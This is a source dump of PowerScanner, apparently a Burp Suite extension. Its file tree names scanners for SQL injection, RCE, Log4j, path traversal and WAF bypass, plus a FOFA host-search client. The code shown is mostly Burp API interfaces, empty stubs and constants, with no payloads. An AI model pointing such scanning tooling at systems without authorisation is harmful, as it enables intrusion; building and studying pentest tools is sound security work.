├── images ├── loadext.png ├── report1.png ├── BypassWAF1.png ├── BypassWAF2.png ├── BypassWAF3.png ├── livescan1.jpg ├── livescan2.png ├── livescan3.png ├── livescan4.png ├── livescan5.png └── livescan6.png ├── src └── main │ └── java │ ├── BrianW │ └── AKA │ │ └── BigChan │ │ ├── PowerScanner │ │ ├── ScanDarkLink.java │ │ ├── collaboratorDic.java │ │ ├── ScanSensitiveParam.java │ │ ├── ScanFastJson.java │ │ ├── ScanSqli.java │ │ ├── ScanRCE.java │ │ ├── ScanSensitiveInfo.java │ │ ├── ScanLog4j.java │ │ ├── ScanPathTraversal.java │ │ ├── ScanSensitiveFiles.java │ │ ├── Reporter.java │ │ └── GetFofaInfo.java │ │ ├── Tools │ │ ├── CollaboratorData.java │ │ ├── Global.java │ │ ├── DnsData.java │ │ ├── SendToProxy.java │ │ ├── CustomScanIssue.java │ │ ├── HitRst.java │ │ ├── DomainTool.java │ │ ├── FetchCollaboratorWithSig.java │ │ ├── InteractionServer.java │ │ └── RequestHelper.java │ │ ├── Handlers │ │ ├── StateHandler.java │ │ ├── PerHostHandler.java │ │ ├── RequestHandler.java │ │ ├── PerRequestHandler.java │ │ └── SessionHandler.java │ │ └── GUI │ │ └── PowerTab.java │ ├── burp │ ├── IHttpHeader.java │ ├── IScopeChangeListener.java │ ├── IHttpRequestResponsePersisted.java │ ├── IIntruderAttack.java │ ├── ITempFile.java │ ├── IExtensionStateListener.java │ ├── IBurpExtender.java │ ├── IScannerListener.java │ ├── IHttpService.java │ ├── ITab.java │ ├── IMenuItemHandler.java │ ├── IProxyListener.java │ ├── IBurpCollaboratorInteraction.java │ ├── IContextMenuFactory.java │ ├── IScannerInsertionPointProvider.java │ ├── IIntruderPayloadGeneratorFactory.java │ ├── IHttpListener.java │ ├── IMessageEditorTabFactory.java │ ├── IIntruderPayloadProcessor.java │ ├── IHttpRequestResponseWithMarkers.java │ ├── IIntruderPayloadGenerator.java │ ├── ICookie.java │ ├── IMessageEditorController.java │ ├── BurpExtender.java │ ├── IResponseKeywords.java │ ├── ISessionHandlingAction.java │ ├── IResponseInfo.java │ ├── IResponseVariations.java │ ├── IMessageEditor.java │ ├── IScanQueueItem.java │ ├── IRequestInfo.java │ ├── ITextEditor.java │ ├── IHttpRequestResponse.java │ ├── IParameter.java │ ├── IScannerCheck.java │ ├── IBurpCollaboratorClientContext.java │ ├── IMessageEditorTab.java │ ├── IInterceptedProxyMessage.java │ ├── IScanIssue.java │ ├── IContextMenuInvocation.java │ └── IScannerInsertionPoint.java │ └── com │ └── r4v3zn │ └── fofa │ └── core │ ├── constants │ ├── UserConsts.java │ ├── FofaFieldsConsts.java │ └── FofaClientConsts.java │ ├── exception │ └── FofaException.java │ ├── enmus │ └── UserVipLevelEnum.java │ ├── DO │ ├── UserLogin.java │ ├── FofaData.java │ └── User.java │ ├── util │ ├── Base64Utils.java │ └── HttpUtils.java │ └── client │ └── FofaClient.java ├── .gitignore ├── scanner.iml ├── README.md └── pom.xml /images/loadext.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/loadext.png -------------------------------------------------------------------------------- /images/report1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/report1.png -------------------------------------------------------------------------------- /images/BypassWAF1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/BypassWAF1.png -------------------------------------------------------------------------------- /images/BypassWAF2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/BypassWAF2.png -------------------------------------------------------------------------------- /images/BypassWAF3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/BypassWAF3.png -------------------------------------------------------------------------------- /images/livescan1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/livescan1.jpg -------------------------------------------------------------------------------- /images/livescan2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/livescan2.png -------------------------------------------------------------------------------- /images/livescan3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/livescan3.png -------------------------------------------------------------------------------- /images/livescan4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/livescan4.png -------------------------------------------------------------------------------- /images/livescan5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/livescan5.png -------------------------------------------------------------------------------- /images/livescan6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/NeoTheCapt/PowerScanner/HEAD/images/livescan6.png -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/ScanDarkLink.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | public class ScanDarkLink { 4 | } 5 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/PowerScanner/collaboratorDic.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.PowerScanner; 2 | 3 | public class collaboratorDic { 4 | 5 | } 6 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/CollaboratorData.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import burp.IScanIssue; 4 | 5 | import java.util.Date; 6 | 7 | public class CollaboratorData { 8 | public IScanIssue issue; 9 | public Date cdate; 10 | public String sig; 11 | 12 | public CollaboratorData(IScanIssue issue, Date cdate, String sig) { 13 | this.issue = issue; 14 | this.cdate = cdate; 15 | this.sig = sig; 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/Global.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import java.util.concurrent.ExecutorService; 4 | 5 | public class Global { 6 | public static BrianW.AKA.BigChan.GUI.PowerTab PowerTab; 7 | public static String configFile = "powerscanner.conf.ini"; 8 | public static String[] fileExt = new String[]{"doc",}; 9 | public static Config config; 10 | // public static InteractionServer interactionServer; 11 | public static ExecutorService fixedThreadPool; 12 | } -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/DnsData.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import java.util.ArrayList; 4 | import java.util.List; 5 | 6 | public class DnsData { 7 | public short transactionID; 8 | public short Flags; 9 | public short Questions; 10 | public short AnswersRRS; 11 | public short AuthorityRRS; 12 | public short AdditionalRRS; 13 | public List Records; 14 | public short RecordType; 15 | public short RecordClass; 16 | public short Field; 17 | public short Type; 18 | public short FieldClass; 19 | public int TTL; 20 | public void test(){ 21 | this.Records.contains("test"); 22 | } 23 | 24 | public DnsData() { 25 | this.Records = new ArrayList<>(); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Handlers/StateHandler.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Handlers; 2 | 3 | import BrianW.AKA.BigChan.Tools.Global; 4 | import burp.IBurpExtenderCallbacks; 5 | import burp.IExtensionHelpers; 6 | import burp.IExtensionStateListener; 7 | 8 | public class StateHandler implements IExtensionStateListener { 9 | protected IBurpExtenderCallbacks callbacks; 10 | protected IExtensionHelpers helpers; 11 | public StateHandler(IBurpExtenderCallbacks callbacks, IExtensionHelpers helpers) { 12 | this.callbacks = callbacks; 13 | this.helpers = helpers; 14 | } 15 | 16 | @Override 17 | public void extensionUnloaded() { 18 | // Global.interactionServer.interrupt(); 19 | this.callbacks.printOutput("Extension unloaded"); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /src/main/java/burp/IHttpHeader.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | /* 3 | * @(#)IHttpHeader.java 4 | * 5 | * Copyright PortSwigger Ltd. All rights reserved. 6 | * 7 | * This code may be used to extend the functionality of Burp Suite Community Edition 8 | * and Burp Suite Professional, provided that this usage does not violate the 9 | * license terms for those products. 10 | */ 11 | /** 12 | * This interface is used to hold details about an HTTP/2 header. 13 | */ 14 | public interface IHttpHeader 15 | { 16 | /** 17 | * This method is used to retrieve the name of the header. 18 | * @return The name of the header. 19 | */ 20 | String getName(); 21 | 22 | /** 23 | * This method is used to retrieve the value of the header. 24 | * @return The value of the header. 25 | */ 26 | String getValue(); 27 | } 28 | -------------------------------------------------------------------------------- /src/main/java/burp/IScopeChangeListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScopeChangeListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerScopeChangeListener() to register 15 | * a scope change listener. The listener will be notified whenever a change 16 | * occurs to Burp's suite-wide target scope. 17 | */ 18 | public interface IScopeChangeListener 19 | { 20 | /** 21 | * This method is invoked whenever a change occurs to Burp's suite-wide 22 | * target scope. 23 | */ 24 | void scopeChanged(); 25 | } 26 | -------------------------------------------------------------------------------- /src/main/java/burp/IHttpRequestResponsePersisted.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpRequestResponsePersisted.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used for an 14 | * IHttpRequestResponse object whose request and response messages 15 | * have been saved to temporary files using 16 | * IBurpExtenderCallbacks.saveBuffersToTempFiles(). 17 | */ 18 | public interface IHttpRequestResponsePersisted extends IHttpRequestResponse 19 | { 20 | /** 21 | * This method is deprecated and no longer performs any action. 22 | */ 23 | @Deprecated 24 | void deleteTempFiles(); 25 | } 26 | -------------------------------------------------------------------------------- /src/main/java/burp/IIntruderAttack.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IIntruderAttack.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details about an Intruder attack. 14 | */ 15 | public interface IIntruderAttack 16 | { 17 | /** 18 | * This method is used to retrieve the HTTP service for the attack. 19 | * 20 | * @return The HTTP service for the attack. 21 | */ 22 | IHttpService getHttpService(); 23 | 24 | /** 25 | * This method is used to retrieve the request template for the attack. 26 | * 27 | * @return The request template for the attack. 28 | */ 29 | byte[] getRequestTemplate(); 30 | 31 | } 32 | -------------------------------------------------------------------------------- /src/main/java/burp/ITempFile.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITempFile.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to hold details of a temporary file that has been 14 | * created via a call to 15 | * IBurpExtenderCallbacks.saveToTempFile(). 16 | * 17 | */ 18 | public interface ITempFile 19 | { 20 | /** 21 | * This method is used to retrieve the contents of the buffer that was saved 22 | * in the temporary file. 23 | * 24 | * @return The contents of the buffer that was saved in the temporary file. 25 | */ 26 | byte[] getBuffer(); 27 | 28 | /** 29 | * This method is deprecated and no longer performs any action. 30 | */ 31 | @Deprecated 32 | void delete(); 33 | } 34 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/constants/UserConsts.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.constants; 17 | 18 | /** 19 | * Title: UserConsts 20 | * Descrption: this is User Consts 21 | * Date:2019-06-07 20:36 22 | * Email:woo0nise@gmail.com 23 | * Company:www.j2ee.app 24 | * 25 | * @author R4v3zn 26 | * @version 1.0.0 27 | */ 28 | public class UserConsts { 29 | 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/burp/IExtensionStateListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IExtensionStateListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerExtensionStateListener() to 15 | * register an extension state listener. The listener will be notified of 16 | * changes to the extension's state. Note: Any extensions that start 17 | * background threads or open system resources (such as files or database 18 | * connections) should register a listener and terminate threads / close 19 | * resources when the extension is unloaded. 20 | */ 21 | public interface IExtensionStateListener 22 | { 23 | /** 24 | * This method is called when the extension is unloaded. 25 | */ 26 | void extensionUnloaded(); 27 | } 28 | -------------------------------------------------------------------------------- /src/main/java/burp/IBurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpExtender.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * All extensions must implement this interface. 14 | * 15 | * Implementations must be called BurpExtender, in the package burp, must be 16 | * declared public, and must provide a default (public, no-argument) 17 | * constructor. 18 | */ 19 | public interface IBurpExtender 20 | { 21 | /** 22 | * This method is invoked when the extension is loaded. It registers an 23 | * instance of the 24 | * IBurpExtenderCallbacks interface, providing methods that may 25 | * be invoked by the extension to perform various actions. 26 | * 27 | * @param callbacks An 28 | * IBurpExtenderCallbacks object. 29 | */ 30 | void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks); 31 | } 32 | -------------------------------------------------------------------------------- /src/main/java/burp/IScannerListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IScannerListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerScannerListener() to register a 15 | * Scanner listener. The listener will be notified of new issues that are 16 | * reported by the Scanner tool. Extensions can perform custom analysis or 17 | * logging of Scanner issues by registering a Scanner listener. 18 | */ 19 | public interface IScannerListener 20 | { 21 | /** 22 | * This method is invoked when a new issue is added to Burp Scanner's 23 | * results. 24 | * 25 | * @param issue An 26 | * IScanIssue object that the extension can query to obtain 27 | * details about the new issue. 28 | */ 29 | void newScanIssue(IScanIssue issue); 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/burp/IHttpService.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IHttpService.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * This interface is used to provide details about an HTTP service, to which 14 | * HTTP requests can be sent. 15 | */ 16 | public interface IHttpService 17 | { 18 | /** 19 | * This method returns the hostname or IP address for the service. 20 | * 21 | * @return The hostname or IP address for the service. 22 | */ 23 | String getHost(); 24 | 25 | /** 26 | * This method returns the port number for the service. 27 | * 28 | * @return The port number for the service. 29 | */ 30 | int getPort(); 31 | 32 | /** 33 | * This method returns the protocol for the service. 34 | * 35 | * @return The protocol for the service. Expected values are "http" or 36 | * "https". 37 | */ 38 | String getProtocol(); 39 | } 40 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/exception/FofaException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.exception; 17 | 18 | /** 19 | * Title: FofaException 20 | * Descrption: FofaException 21 | * Date:2019-06-07 16:12 22 | * Email:woo0nise@gmail.com 23 | * Company:www.j2ee.app 24 | * 25 | * @author R4v3zn 26 | * @version 1.0.0 27 | */ 28 | public class FofaException extends Exception{ 29 | 30 | /** 31 | * Constructor 32 | * @param msg message 33 | */ 34 | public FofaException(String msg){ 35 | super(msg); 36 | } 37 | } -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | <<<<<<< HEAD 2 | # Binaries for programs and plugins 3 | *.exe 4 | *.exe~ 5 | *.dll 6 | *.so 7 | *.dylib 8 | 9 | # Test binary, built with `go test -c` 10 | *.test 11 | 12 | # Output of the go coverage tool, specifically when used with LiteIDE 13 | *.out 14 | 15 | # Dependency directories (remove the comment below to include it) 16 | # vendor/ 17 | ======= 18 | # Created by .ignore support plugin (hsz.mobi) 19 | ### JDeveloper template 20 | # default application storage directory used by the IDE Performance Cache feature 21 | .data/ 22 | 23 | # used for ADF styles caching 24 | temp/ 25 | 26 | # default output directories 27 | classes/ 28 | deploy/ 29 | javadoc/ 30 | 31 | # lock file, a part of Oracle Credential Store Framework 32 | cwallet.sso.lck 33 | ### Java template 34 | # Compiled class file 35 | *.class 36 | 37 | # Log file 38 | *.log 39 | 40 | # BlueJ files 41 | *.ctxt 42 | 43 | # Mobile Tools for Java (J2ME) 44 | .mtj.tmp/ 45 | 46 | # Package Files # 47 | *.jar 48 | *.war 49 | *.nar 50 | *.ear 51 | *.zip 52 | *.tar.gz 53 | *.rar 54 | 55 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml 56 | hs_err_pid* 57 | .idea/ 58 | >>>>>>> init 59 | 60 | # Project exclude paths 61 | /out/ 62 | /target/ 63 | *.bak -------------------------------------------------------------------------------- /src/main/java/burp/ITab.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)ITab.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | 14 | /** 15 | * This interface is used to provide Burp with details of a custom tab that will 16 | * be added to Burp's UI, using a method such as 17 | * IBurpExtenderCallbacks.addSuiteTab(). 18 | */ 19 | public interface ITab 20 | { 21 | /** 22 | * Burp uses this method to obtain the caption that should appear on the 23 | * custom tab when it is displayed. 24 | * 25 | * @return The caption that should appear on the custom tab when it is 26 | * displayed. 27 | */ 28 | String getTabCaption(); 29 | 30 | /** 31 | * Burp uses this method to obtain the component that should be used as the 32 | * contents of the custom tab when it is displayed. 33 | * 34 | * @return The component that should be used as the contents of the custom 35 | * tab when it is displayed. 36 | */ 37 | Component getUiComponent(); 38 | } 39 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/enmus/UserVipLevelEnum.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.enmus; 17 | 18 | /** 19 | * Title: UserVipLevelEnum 20 | * Descrption: TODO 21 | * Date:2019-06-07 20:45 22 | * Email:woo0nise@gmail.com 23 | * Company:www.j2ee.app 24 | * 25 | * @author R4v3zn 26 | * @version 1.0.0 27 | */ 28 | public enum UserVipLevelEnum { 29 | 30 | /** 31 | * Senior member, Free member 32 | */ 33 | SVIP(2,"高级会员"),VIP(1,"普通会员"); 34 | 35 | private String levelName; 36 | 37 | private Integer code; 38 | 39 | UserVipLevelEnum(Integer code,String levelName){ 40 | this.code = code; 41 | this.levelName = levelName; 42 | } 43 | 44 | } -------------------------------------------------------------------------------- /src/main/java/burp/IMenuItemHandler.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IMenuItemHandler.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerMenuItem() to register a custom 15 | * context menu item. 16 | * 17 | * @deprecated Use 18 | * IContextMenuFactory instead. 19 | */ 20 | @Deprecated 21 | public interface IMenuItemHandler 22 | { 23 | /** 24 | * This method is invoked by Burp Suite when the user clicks on a custom 25 | * menu item which the extension has registered with Burp. 26 | * 27 | * @param menuItemCaption The caption of the menu item which was clicked. 28 | * This parameter enables extensions to provide a single implementation 29 | * which handles multiple different menu items. 30 | * @param messageInfo Details of the HTTP message(s) for which the context 31 | * menu was displayed. 32 | */ 33 | void menuItemClicked( 34 | String menuItemCaption, 35 | IHttpRequestResponse[] messageInfo); 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/constants/FofaFieldsConsts.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.constants; 17 | 18 | import java.util.Arrays; 19 | import java.util.List; 20 | 21 | /** 22 | * Title: FofaFieldsConsts 23 | * Descrption: this is FOFA Pro fields Constants 24 | * Date:2019-06-08 18:53 25 | * Email:woo0nise@gmail.com 26 | * Company:www.j2ee.app 27 | * 28 | * @author R4v3zn 29 | * @version 1.0.0 30 | */ 31 | public class FofaFieldsConsts { 32 | 33 | /** 34 | * FOFA Pro fields list 35 | */ 36 | public static final List FIELDS_LIST = Arrays.asList(new String[]{"host","title","ip","domain","port","country","province","city","country_name","header","protocol","banner","cert","isp","as_number","as_organization","latitude","longitude"}); 37 | } -------------------------------------------------------------------------------- /src/main/java/BrianW/AKA/BigChan/Tools/SendToProxy.java: -------------------------------------------------------------------------------- 1 | package BrianW.AKA.BigChan.Tools; 2 | 3 | import org.apache.http.HttpHost; 4 | import java.net.URL; 5 | import java.util.List; 6 | 7 | public class SendToProxy implements Runnable{ 8 | protected URL url; 9 | protected List headers; 10 | protected byte[] body; 11 | protected HttpHost proxy; 12 | protected String user; 13 | protected String pass; 14 | protected String method; 15 | public SendToProxy(URL url, String method, List headers, byte[] body, HttpHost proxy){ 16 | this.url = url; 17 | this.headers = headers; 18 | this.body = body; 19 | this.proxy = proxy; 20 | this.user = ""; 21 | this.pass = ""; 22 | this.method = method; 23 | } 24 | public SendToProxy(URL url, String method, List headers, byte[] body, HttpHost proxy, String user, String pass){ 25 | this.url = url; 26 | this.headers = headers; 27 | this.body = body; 28 | this.proxy = proxy; 29 | this.user = user; 30 | this.pass = pass; 31 | this.method = method; 32 | } 33 | 34 | public void run() { 35 | try { 36 | RequestHelper.doRequestViaProxy(this.url, this.method, this.headers, this.body, this.proxy, this.user, this.pass); 37 | } catch (Exception e) { 38 | e.printStackTrace(); 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /scanner.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /src/main/java/com/r4v3zn/fofa/core/constants/FofaClientConsts.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2019. r4v3zn. 3 | * Licensed under the Apache License, Version 2.0 (the "License"); 4 | * you may not use this file except in compliance with the License. 5 | * You may obtain a copy of the License at 6 | * 7 | * http://www.apache.org/licenses/LICENSE-2.0 8 | * 9 | * Unless required by applicable law or agreed to in writing, software 10 | * distributed under the License is distributed on an "AS IS" BASIS, 11 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | * See the License for the specific language governing permissions and 13 | * limitations under the License. 14 | */ 15 | 16 | package com.r4v3zn.fofa.core.constants; 17 | 18 | /** 19 | * Title: FofaClientConsts 20 | * Descrption: this is Fofo Pro Client Constants 21 | * Date:2019-06-07 21:56 22 | * Email:woo0nise@gmail.com 23 | * Company:www.j2ee.app 24 | * 25 | * @author R4v3zn 26 | * @version 1.0.0 27 | */ 28 | public class FofaClientConsts { 29 | 30 | /** 31 | * Base FOFA Pro Api 32 | */ 33 | public static final String BASE_URL = "https://fofa.so"; 34 | 35 | /** 36 | * get user info uri 37 | */ 38 | public static final String GET_USER_INFO_URI = "/api/v1/info/my"; 39 | 40 | /** 41 | * search uri 42 | */ 43 | public static final String SEARCH_URI = "/api/v1/search/all"; 44 | 45 | /** 46 | * max size 47 | */ 48 | public static final Integer MAX_SIZE = 10000; 49 | } 50 | -------------------------------------------------------------------------------- /src/main/java/burp/IProxyListener.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IProxyListener.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * Extensions can implement this interface and then call 14 | * IBurpExtenderCallbacks.registerProxyListener() to register a 15 | * Proxy listener. The listener will be notified of requests and responses being 16 | * processed by the Proxy tool. Extensions can perform custom analysis or 17 | * modification of these messages, and control in-UI message interception, by 18 | * registering a proxy listener. 19 | */ 20 | public interface IProxyListener 21 | { 22 | /** 23 | * This method is invoked when an HTTP message is being processed by the 24 | * Proxy. 25 | * 26 | * @param messageIsRequest Indicates whether the HTTP message is a request 27 | * or a response. 28 | * @param message An 29 | * IInterceptedProxyMessage object that extensions can use to 30 | * query and update details of the message, and control whether the message 31 | * should be intercepted and displayed to the user for manual review or 32 | * modification. 33 | */ 34 | void processProxyMessage( 35 | boolean messageIsRequest, 36 | IInterceptedProxyMessage message); 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/burp/IBurpCollaboratorInteraction.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpCollaboratorInteraction.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.Map; 13 | 14 | /** 15 | * This interface represents a network interaction that occurred with the Burp 16 | * Collaborator server. 17 | */ 18 | public interface IBurpCollaboratorInteraction 19 | { 20 | 21 | /** 22 | * This method is used to retrieve a property of the interaction. Properties 23 | * of all interactions are: interaction_id, type, client_ip, and time_stamp. 24 | * Properties of DNS interactions are: query_type and raw_query. The 25 | * raw_query value is Base64-encoded. Properties of HTTP interactions are: 26 | * protocol, request, and response. The request and response values are 27 | * Base64-encoded. 28 | * 29 | * @param name The name of the property to retrieve. 30 | * @return A string representing the property value, or null if not present. 31 | */ 32 | String getProperty(String name); 33 | 34 | /** 35 | * This method is used to retrieve a map containing all properties of the 36 | * interaction. 37 | * 38 | * @return A map containing all properties of the interaction. 39 | */ 40 | Map getProperties(); 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/burp/IContextMenuFactory.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IContextMenuFactory.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | 13 | import javax.swing.JMenuItem; 14 